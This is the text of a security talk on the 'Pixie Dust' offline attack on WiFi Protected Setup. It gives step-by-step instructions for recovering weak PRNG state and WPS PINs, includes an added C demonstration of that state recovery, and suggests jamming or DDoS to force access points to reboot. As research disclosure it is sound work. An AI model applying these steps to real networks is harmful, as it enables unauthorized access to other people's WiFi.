Offline bruteforce attack on WiFi Protected Setup
Dominique Bongard
Founder
0xcite, Switzerland
@reversity
- Protocol aiming at easily connecting to protected WiFi networks
- Two main modes: Push-Button and 8-digit PIN code
- Gives the WPA passphrase to stations providing the right PIN
- Poor design and implementation
Stefan Viehböck
- Brute force each half of the PIN
- Maximum 10,000 tries + 1,000 tries
- No limitation on number of tries in many AP
- Takes a few hours (depends on the AP)
- Largely slowed down in new devices (lock-out)
- Many AP still sold with WPS PIN activated
[Diagram: WPS exchange between STA and AP. Nonce; E-Hash1, E-Hash2 (HMAC); AES(HMAC(PIN1), E-S1), AES(HMAC(PIN2), E-S2)]
- If we can guess E-S1 and E-S2, we can then brute force PIN1 and PIN2 offline!
- Pixie dust attack!
- Usually with pseudo-random generators (PRNG)
- Often insecure PRNG
- No or low entropy
- Small state (32 bits)
- Can the PRNG state be recovered?
#include <stdlib.h>   /* RAND_MAX */

int rand_r( unsigned int *seed ) {
    unsigned int s = *seed;
    unsigned int uret;
    int retval;
    s = (s * 1103515245) + 12345;          // permutate seed
    uret = s & 0xffe00000;                 // Only use top 11 bits
    s = (s * 1103515245) + 12345;          // permutate seed
    uret += (s & 0xfffc0000) >> 11;        // Only use top 14 bits
    s = (s * 1103515245) + 12345;          // permutate seed
    uret += (s & 0xfe000000) >> (11+14);   // Only use top 7 bits
    retval = (int)(uret & RAND_MAX);       // 31-bit output built from three LCG steps
    *seed = s;
    return retval;
}
[Table: AP / Nonce / Description / PK]
- Linear Congruential Generator
- 32-bit state
- No external entropy
- E-S1 and E-S2 generated right after the Nonce
- Do the WPS protocol up to message M3
- Get the Nonce from M1
- Bruteforce the state of the PRNG
- Compute E-S1 and E-S2 from the state
- Decrypt E-Hash1 and E-Hash2
- Bruteforce PIN1 and PIN2
- Do the full WPS protocol and get the passphrase
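To show concretely why a 32-bit LCG with no external entropy (the rand_r above) fails, and what "bruteforce the state of the PRNG" and "compute E-S1 and E-S2 from the state" mean, here is an added example that is not code from the talk: it models an AP drawing its Nonce and then E-S1/E-S2 from that generator, recovers the generator state from the public Nonce alone, and checks that the later secrets are then fully predictable. The word layout (four outputs for the Nonce, four each for E-S1 and E-S2) and the bounded search range are assumptions made for the demonstration; the real search space is the full 2^32 states.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* The 32-bit LCG from the slide, with the same constants and bit selection. */
static int weak_rand_r(unsigned int *seed) {
    unsigned int s = *seed, uret;
    s = s * 1103515245u + 12345u; uret = s & 0xffe00000u;                 /* top 11 bits */
    s = s * 1103515245u + 12345u; uret += (s & 0xfffc0000u) >> 11;        /* next 14 bits */
    s = s * 1103515245u + 12345u; uret += (s & 0xfe000000u) >> (11 + 14); /* next 7 bits */
    *seed = s;
    return (int)(uret & RAND_MAX);
}

/* Constructed model of the firmware: the 128-bit Nonce is the first four
 * outputs, E-S1 and E-S2 are the next four outputs each (an assumption). */
enum { NONCE_WORDS = 4, SECRET_WORDS = 8 };

static void draw_words(unsigned int *seed, uint32_t *out, size_t n) {
    for (size_t i = 0; i < n; i++) out[i] = (uint32_t)weak_rand_r(seed);
}

/* Search seeds in [lo, hi] for one that reproduces the observed Nonce.
 * With no external entropy the whole space is only 2^32 states, which is
 * what makes an offline search feasible; the range is a parameter so the
 * demo stays fast. Returns 1 and sets *found on success, 0 otherwise. */
static int recover_state(const uint32_t *nonce, uint32_t lo, uint32_t hi, uint32_t *found) {
    for (uint64_t cand = lo; cand <= hi; cand++) {
        unsigned int s = (unsigned int)cand;
        size_t i = 0;
        while (i < NONCE_WORDS && (uint32_t)weak_rand_r(&s) == nonce[i]) i++;
        if (i == NONCE_WORDS) { *found = (uint32_t)cand; return 1; }
    }
    return 0;
}

/* End-to-end check: draw Nonce + secrets from true_seed, recover the state
 * from the Nonce alone, then see whether the secrets drawn afterwards are
 * predictable. Returns 0 (state not found in range), 1 (found and the
 * secrets are fully predicted) or 2 (found but prediction failed). */
static int demo_state_recovery(unsigned int true_seed, uint32_t search_hi) {
    unsigned int s = true_seed;
    uint32_t words[NONCE_WORDS + SECRET_WORDS], predicted[SECRET_WORDS], found = 0;
    draw_words(&s, words, NONCE_WORDS + SECRET_WORDS);           /* what the AP sends/uses */
    if (!recover_state(words, 0, search_hi, &found)) return 0;   /* observer sees only the Nonce */
    s = found;
    for (int i = 0; i < NONCE_WORDS; i++) (void)weak_rand_r(&s); /* replay the Nonce draws */
    draw_words(&s, predicted, SECRET_WORDS);                     /* what E-S1 / E-S2 must be */
    return memcmp(predicted, words + NONCE_WORDS, sizeof predicted) == 0 ? 1 : 2;
}
```

A generator that passes this check is the defender's goal: E-S1 and E-S2 must not be derivable from anything the AP has already sent, which a 32-bit state seeded without entropy cannot guarantee.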
- Linear Feedback Shift Register (LFSR)
- Broken
- Doesn't matter: the keys are always NULL!!
- Some AP have the same state at each boot
- Make a list of common states after reboot
- Attack the AP right after boot
- Trigger the breakers
- DDoS the AP
- Jam the signal until the target reboots the AP
- Looks okay
- Uses /dev/random
- Found in Atheros SDK
- But you never know
- Several papers attack the entropy of the Linux PRNG in embedded systems
- It's complicated
- Many of the implementations are the reference code for the chipset
- Only the GUI is reskinned
- Therefore many brands are affected
- Many vendors use different chipsets
- Even for the same model number
- Disable WPS now!
- Reverse engineers: check other AP for bad PRNGs
- Cryptographers: check if the good-looking PRNGs are actually okay